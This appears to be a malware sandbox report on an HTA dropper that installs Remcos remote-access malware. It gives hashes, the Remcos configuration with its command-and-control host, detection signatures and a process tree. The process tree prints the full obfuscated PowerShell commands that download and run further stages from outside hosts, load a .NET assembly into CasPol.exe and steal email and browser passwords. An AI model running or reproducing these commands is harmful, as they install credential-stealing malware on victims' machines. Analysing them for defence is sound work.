Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
12/11/2024, 09:42
Static task
static1
Behavioral task
behavioral1
Sample
seemybesttimeforgivenmebestthingswithentiretimeforgivenmegreat.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
seemybesttimeforgivenmebestthingswithentiretimeforgivenmegreat.hta
Resource
win10v2004-20241007-en
General
-
Target
seemybesttimeforgivenmebestthingswithentiretimeforgivenmegreat.hta
-
Size
207KB
-
MD5
a9cf15c4f82d5c26f48f4a16dfe7bd1a
-
SHA1
f7f0b669264b0a42b290cb5476e21ffa51eebf34
-
SHA256
ff98902753abefb76884fc6fa5fa34f389b215ad9a447bf434624f097f12ad57
-
SHA512
5a5f5e6d18a776646328ce85e59f12424f1fb8c2612d1299db7bc378177be369bb6e391488b02d40a682c37857bcf0576d415534c5aba4796f46c39ea5b21d2c
-
SSDEEP
48:4FhWsTR/F7gNqXfkz0eZC0yZhboWWCRzESPUJ0cv5p299DdCf+xuj9AoapwSI0t7:43F97AIyCRRtnu4fAf+cZAoaDna8YQ
Malware Config
Extracted
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
Extracted
remcos
RemoteHost
wayo.duckdns.org:6847
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-Z90JT3
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/2400-128-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/2116-126-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/2528-125-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/2528-125-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/2116-126-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 3 IoCs
flow pid Process 15 1704 PoWeRsHELL.EXE 20 4216 powershell.exe 25 4216 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 4840 powershell.exe 4216 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 1704 PoWeRsHELL.EXE 2312 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts CasPol.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 4216 set thread context of 1036 4216 powershell.exe 102 PID 1036 set thread context of 2116 1036 CasPol.exe 104 PID 1036 set thread context of 2528 1036 CasPol.exe 105 PID 1036 set thread context of 2400 1036 CasPol.exe 106 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 12 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PoWeRsHELL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings PoWeRsHELL.EXE -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 1704 PoWeRsHELL.EXE 1704 PoWeRsHELL.EXE 2312 powershell.exe 2312 powershell.exe 4840 powershell.exe 4840 powershell.exe 4216 powershell.exe 4216 powershell.exe 2116 CasPol.exe 2116 CasPol.exe 2400 CasPol.exe 2400 CasPol.exe 2116 CasPol.exe 2116 CasPol.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 1036 CasPol.exe 1036 CasPol.exe 1036 CasPol.exe 1036 CasPol.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 1704 PoWeRsHELL.EXE Token: SeDebugPrivilege 2312 powershell.exe Token: SeDebugPrivilege 4840 powershell.exe Token: SeDebugPrivilege 4216 powershell.exe Token: SeDebugPrivilege 2400 CasPol.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1036 CasPol.exe -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 4148 wrote to memory of 1704 4148 mshta.exe 86 PID 4148 wrote to memory of 1704 4148 mshta.exe 86 PID 4148 wrote to memory of 1704 4148 mshta.exe 86 PID 1704 wrote to memory of 2312 1704 PoWeRsHELL.EXE 88 PID 1704 wrote to memory of 2312 1704 PoWeRsHELL.EXE 88 PID 1704 wrote to memory of 2312 1704 PoWeRsHELL.EXE 88 PID 1704 wrote to memory of 1104 1704 PoWeRsHELL.EXE 93 PID 1704 wrote to memory of 1104 1704 PoWeRsHELL.EXE 93 PID 1704 wrote to memory of 1104 1704 PoWeRsHELL.EXE 93 PID 1104 wrote to memory of 3016 1104 csc.exe 94 PID 1104 wrote to memory of 3016 1104 csc.exe 94 PID 1104 wrote to memory of 3016 1104 csc.exe 94 PID 1704 wrote to memory of 440 1704 PoWeRsHELL.EXE 96 PID 1704 wrote to memory of 440 1704 PoWeRsHELL.EXE 96 PID 1704 wrote to memory of 440 1704 PoWeRsHELL.EXE 96 PID 440 wrote to memory of 4840 440 WScript.exe 97 PID 440 wrote to memory of 4840 440 WScript.exe 97 PID 440 wrote to memory of 4840 440 WScript.exe 97 PID 4840 wrote to memory of 4216 4840 powershell.exe 99 PID 4840 wrote to memory of 4216 4840 powershell.exe 99 PID 4840 wrote to memory of 4216 4840 powershell.exe 99 PID 4216 wrote to memory of 1036 4216 powershell.exe 102 PID 4216 wrote to memory of 1036 4216 powershell.exe 102 PID 4216 wrote to memory of 1036 4216 powershell.exe 102 PID 4216 wrote to memory of 1036 4216 powershell.exe 102 PID 4216 wrote to memory of 1036 4216 powershell.exe 102 PID 4216 wrote to memory of 1036 4216 powershell.exe 102 PID 4216 wrote to memory of 1036 4216 powershell.exe 102 PID 4216 wrote to memory of 1036 4216 powershell.exe 102 PID 4216 wrote to memory of 1036 4216 powershell.exe 102 PID 4216 wrote to memory of 1036 4216 powershell.exe 102 PID 1036 wrote to memory of 976 1036 CasPol.exe 103 PID 1036 wrote to memory of 976 1036 CasPol.exe 103 PID 1036 wrote to memory of 976 1036 CasPol.exe 103 PID 1036 wrote to memory of 2116 1036 CasPol.exe 104 PID 1036 wrote to memory of 2116 1036 CasPol.exe 104 PID 1036 wrote to memory of 2116 1036 CasPol.exe 104 PID 1036 wrote to memory of 2116 1036 CasPol.exe 104 PID 1036 wrote to memory of 2528 1036 CasPol.exe 105 PID 1036 wrote to memory of 2528 1036 CasPol.exe 105 PID 1036 wrote to memory of 2528 1036 CasPol.exe 105 PID 1036 wrote to memory of 2528 1036 CasPol.exe 105 PID 1036 wrote to memory of 2400 1036 CasPol.exe 106 PID 1036 wrote to memory of 2400 1036 CasPol.exe 106 PID 1036 wrote to memory of 2400 1036 CasPol.exe 106 PID 1036 wrote to memory of 2400 1036 CasPol.exe 106
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seemybesttimeforgivenmebestthingswithentiretimeforgivenmegreat.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4148 -
C:\Windows\SysWOW64\wiNDOWSpoWeRshell\V1.0\PoWeRsHELL.EXE"C:\Windows\SysTEm32\wiNDOWSpoWeRshell\V1.0\PoWeRsHELL.EXE" "PoWerSheLl.exE -EX bYPaSs -nOp -W 1 -C DeVIcecRedEnTIAldePLoYmeNT ; Iex($(iEX('[sYSTEm.teXt.EncOdInG]'+[Char]58+[CHar]58+'utf8.gEtSTRIng([sYsTeM.CoNVERt]'+[chAr]0X3a+[ChAR]0x3a+'fROmbaSe64StrInG('+[Char]0X22+'JHhPVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZEQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iZXJEZUZpTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFU1RuY2xIQkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUVlLeFpVVHBBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV4WnhmeGlKLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXVlpTdlp6Q2p4LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtFV09RcFNsZlRkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicnFDcFB6RkpybUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHhPVzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTkyLzU1L3NlZW1lYmVzdHRoaW5nc29udGhlcGFydG9md29ybGR3aGljaGdycndlYXRmb3IudElGIiwiJGVOVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc29udGhlcGFydG9md29ybGR3aGljaGdycncudmJTIiwwLDApO1NUQVJULVNMZWVQKDMpO1NUQXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NvbnRoZXBhcnRvZndvcmxkd2hpY2hncnJ3LnZiUyI='+[chAr]0X22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPaSs -nOp -W 1 -C DeVIcecRedEnTIAldePLoYmeNT3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2312
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zcsy5o0v\zcsy5o0v.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1104 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8174.tmp" "c:\Users\Admin\AppData\Local\Temp\zcsy5o0v\CSC396080E4024A39AD9383C4CB9551.TMP"4⤵
- System Location Discovery: System Language Discovery
PID:3016
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seemebestthingsonthepartofworldwhichgrrw.vbS"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:440 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHZFcmJvc2VQckVGZXJFTkNFLlRvU1RSSW5nKClbMSwzXSsnWCctSm9pTicnKSgoKCdJY3BpbWFnZVVybCA9IE9BSWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2QnKyc5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgT0FJO0ljcHdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7SWNwaW1hZ2VCeXRlcyA9IEljcHdlYkNsaWVudCcrJy5Eb3dubG9hZERhdGEoSWNwaW1hZ2VVcmwpO0ljcGltYScrJ2dlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVUJysnRjguR2V0U3RyaW5nKEljcGltYWdlQnl0ZXMpO0ljcHN0YXJ0RmxhZyA9IE9BSTw8QkFTRTY0X1NUQVJUPj5PQUk7SWNwZW5kRmxhZyA9IE9BSTw8QkFTRTY0X0VORD4+T0FJO0ljcHN0YXJ0SW4nKydkZXggPSBJY3BpbWFnZVRleHQuSW5kZXhPZihJY3BzdGFydEZsYWcpO0ljcGVuZEluZGV4ID0gJysnSWNwaW1hZ2VUZXh0LkluZGV4T2YoSWNwZW5kRmxhZyknKyc7SWNwc3RhcnRJbmRleCAtZ2UgMCAtYW5kIEljcGVuZEluZGV4IC1ndCBJY3BzdGFydEluZGV4O0ljcHN0YXJ0SW5kZXggKz0gSWNwc3RhcnRGbGFnLkxlbicrJ2d0aDtJY3BiYXNlNjRMZW5ndGggPSBJY3BlbmRJbmRleCAtIEljcHN0YScrJ3J0SW4nKydkZXg7SWNwYmEnKydzZTY0Q29tbWFuZCA9IEljcGltYWdlVGV4dC5TdWJzdHJpbmcoSWNwc3RhcnRJbmRleCwgSWNwYmFzZTY0TGVuZ3RoKTtJY3BiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChJY3BiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMTR1IEZvckVhY2gtTycrJ2JqZWN0IHsgSWNwXyB9KVstMScrJy4uLShJY3BiYXNlNjRDb21tYW5kLkxlbicrJ2d0aCldO0ljcGNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoSWNwYmFzZTYnKyc0UmV2ZXJzZWQpO0ljcGxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChJY3AnKydjb21tYW5kQnl0ZXMpO0ljJysncHZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoT0FJVkFJT0FJKTtJY3B2JysnYWlNZXRobycrJ2QuSW52b2tlKEljcG51bGwsIEAnKycoTycrJ0FJdHh0LkRFRERFV0VTLzU1LzI5MS44NzEuNjQuODkxLy86cHR0aE9BSSwnKycgT0FJZGUnKydzYXRpdmFkb09BSSwgT0FJZGVzYXRpdmEnKydkb09BSSwgT0FJZGVzYXRpdmFkb09BSSwgT0FJQ2EnKydzUG9sT0FJLCAnKydPQUlkZXNhdGl2YWRvT0FJLCBPQUlkZXNhdGl2YWRvT0FJLE9BSWRlc2F0aXZhZG9PQUksT0FJZGVzYXRpdmFkb09BSSxPQUlkZXNhdGl2YWRvT0FJLE9BSWRlc2F0aXZhZG9PQUksT0FJZGVzYXRpdmFkb09BSSxPQUkxT0FJLE9BSWRlc2F0aXZhZG9PQUkpKTsnKSAtUmVwTEFjRSAoW0NoYVJdNDkrW0NoYVJdNTIrW0NoYVJdMTE3KSxbQ2hhUl0xMjQgIC1jcmVwbEFDRSdPQUknLFtDaGFSXTM5IC1jcmVwbEFDRShbQ2hhUl03MytbQ2hhUl05OStbQ2hhUl0xMTIpLFtDaGFSXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4840 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $vErbosePrEFerENCE.ToSTRIng()[1,3]+'X'-JoiN'')((('IcpimageUrl = OAIhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd'+'9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f OAI;IcpwebClient = New-Object System.Net.WebClient;IcpimageBytes = IcpwebClient'+'.DownloadData(IcpimageUrl);Icpima'+'geText = [System.Text.Encoding]::UT'+'F8.GetString(IcpimageBytes);IcpstartFlag = OAI<<BASE64_START>>OAI;IcpendFlag = OAI<<BASE64_END>>OAI;IcpstartIn'+'dex = IcpimageText.IndexOf(IcpstartFlag);IcpendIndex = '+'IcpimageText.IndexOf(IcpendFlag)'+';IcpstartIndex -ge 0 -and IcpendIndex -gt IcpstartIndex;IcpstartIndex += IcpstartFlag.Len'+'gth;Icpbase64Length = IcpendIndex - Icpsta'+'rtIn'+'dex;Icpba'+'se64Command = IcpimageText.Substring(IcpstartIndex, Icpbase64Length);Icpbase64Reversed = -join (Icpbase64Command.ToCharArray() 14u ForEach-O'+'bject { Icp_ })[-1'+'..-(Icpbase64Command.Len'+'gth)];IcpcommandBytes = [Syst'+'em.Convert]::FromBase64String(Icpbase6'+'4Reversed);IcploadedAssembly = [System.Reflection.Assembly]::Load(Icp'+'commandBytes);Ic'+'pvaiMethod = [dnlib.IO.Home].GetMethod(OAIVAIOAI);Icpv'+'aiMetho'+'d.Invoke(Icpnull, @'+'(O'+'AItxt.DEDDEWES/55/291.871.64.891//:ptthOAI,'+' OAIde'+'sativadoOAI, OAIdesativa'+'doOAI, OAIdesativadoOAI, OAICa'+'sPolOAI, '+'OAIdesativadoOAI, OAIdesativadoOAI,OAIdesativadoOAI,OAIdesativadoOAI,OAIdesativadoOAI,OAIdesativadoOAI,OAIdesativadoOAI,OAI1OAI,OAIdesativadoOAI));') -RepLAcE ([ChaR]49+[ChaR]52+[ChaR]117),[ChaR]124 -creplACE'OAI',[ChaR]39 -creplACE([ChaR]73+[ChaR]99+[ChaR]112),[ChaR]36) )"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4216 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1036 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\egbzlbanuvmwllha"7⤵PID:976
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\egbzlbanuvmwllha"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2116
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\pigjmtkhidebvrvemjb"7⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:2528
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\rctcnmvbwlwoxfrivuvcfji"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2400
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
102B
MD5515191e2f4621f9e3906f24e03e5f568
SHA18fe0c10b13c990aba6c32514a1fcb509f075587b
SHA25628c1fba33974826683c549307abb51ad851629b7e58f68bff813262ed8addbd8
SHA5124d5838ac3adc2a11c5963b75fcb23818a2eb1a7cb8307e4d6fa6144f8208922ccdef7c590b3eb58e9cbba323803013e31dcb3c792c1a1b5f7e6ff092cc0dac74
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
12KB
MD59be5b063a7c5d44ed99bf0fbb51f1086
SHA1c94f2df2ee3e60a5fdf66994d954586e65b1247d
SHA256c4618aa00cadfd17ece31506b7da90f2453abc60ed796e74fd754aa79a3b5d29
SHA5128bc4d4ecae606c1997885a13477ca5a978a07962c2ba83c62e4d45d332870e852266efb109144f6c5af9b59bc7f69e4059ea66907a99583047bcc89aa8a1820a
-
Filesize
18KB
MD5f38cd1e42aa7d61bc583db0d0a98ee61
SHA19524392731262f958267c6bc755ed24fce0affd2
SHA25623a6b6e9fc02c41aa1098bdcf4952189f544f164ff232bd1d669d9e422737b61
SHA512e0ed666171698a5a04ca120d4c72501a2fe7fd5c9e476c47affb76af8ebda90763d4122c57417978568548a8e022cd97b8a3ce140c6c2ae0e3adb3d66bdf21f7
-
Filesize
1KB
MD5ba14519b51d16698df9479fc589ef3b0
SHA104aa1c1000ffb600dc045208bf33f3dbd3b78b07
SHA25658939b35c28f33ec962934439908ecd956d9e5027d2a51d025a3fc07288fc2e7
SHA512be12c79a62b7734166f5ad21620b67ebc4218a318824893676f8012c660d3ea54c426408759c0b2be59a230c43be38823f00326f1b6f2a66d8f29edbfbc17ec7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD5bc25ccf39db8626dc249529bcc8c5639
SHA13e9cbdb20a0970a3c13719a2f289d210cdcc9e1d
SHA256b333f8c736c701bc826886f395d928731850cbce6db77be752b3cf7979114904
SHA5129a546127bddc1d187e674cda82e6c5046cac7f3e6f9515aed68d5bff2264b9d679d857dd97270e10826cd11ce2d92d82dd7f9801e19027e346b60bcc814cca1a
-
Filesize
3KB
MD5507d747d3720a1fe3971a0864a34ea5d
SHA1fed2ff8c69208b30fa885a29ccbda2cba4f7b468
SHA25612b81c1e2417b5aa1249721efb3fd44f968c42dac75548a0b069941d291519ba
SHA51254df45b32715a1f06451c7bf443d164fc89f44fc8e403c6be95b18ec47704bd1328cdb311c0a29d7cb0a002aaec362e814b1091ec35b11e40761843d7c5ebf0c
-
Filesize
139KB
MD51860dcae987d5ed903d93a6cfc698eaf
SHA1aaee36eb86bd7c80fd0ae9328bea5650f8c74d12
SHA256d72fec7ef303edc51d89e59e92743962f4f742d4678f4d01cafb1a110741efb3
SHA51273befb8642d5c9828c6d67bcbcb4b6128410c07e2abbef7ae65a3fa4fc067ee50e7c9c81cf1e2f2b56ddd8cbfa94f20bf56ce3e8848d7a9403a14c8de6d22742
-
Filesize
652B
MD5e4fe3b9b6ecb9517cf93b993414a1312
SHA154296a787de9ffde65ccee714438163e8a31f467
SHA256d80463790bb2128f6f6301f3d567d82a998694bed96f6b3f59e27067b7946dbc
SHA51237d096d00c0c5dc68747e67ddedb52ef509fbe75d6ae539ac4bbacb7f5a7894061518671c1d9148ac978782d80622522d3e178cf9b27b526e4593d40308c9eb7
-
Filesize
496B
MD5f8f40cf06d8b2ceb49d38fdf52e8ecc0
SHA11ff0676c6503f21f4899ba1cbc30351318403804
SHA25639f96499c4e911bc620f0facad68dab4452781beb339326f5910c5caea5714a2
SHA512020e05dd5bd89e587dfa492086e433ea0620fb58ead54c1325a527ba8d1bf7251faa66116b69b4a802e4f2994215de1b146fd2df6f9347470e280bf7a22a7857
-
Filesize
369B
MD58823032bac9de5190be6e5e96e547191
SHA10fd1f359405092cc6ac99c92cdac32c28f2f7cc7
SHA256cdd815b10dd2ff86ffccaf0c341150f1afcb1e8906f8a5d313c76548b2f5eeaa
SHA512e1b161a2243ac2ecbc8f31021dc5f9d022ceb4803c473335b3dabfc95588b12d51c8138d658c04188370c06252fc5eb2bda913b6ebc7f111ca194f4c0ba91691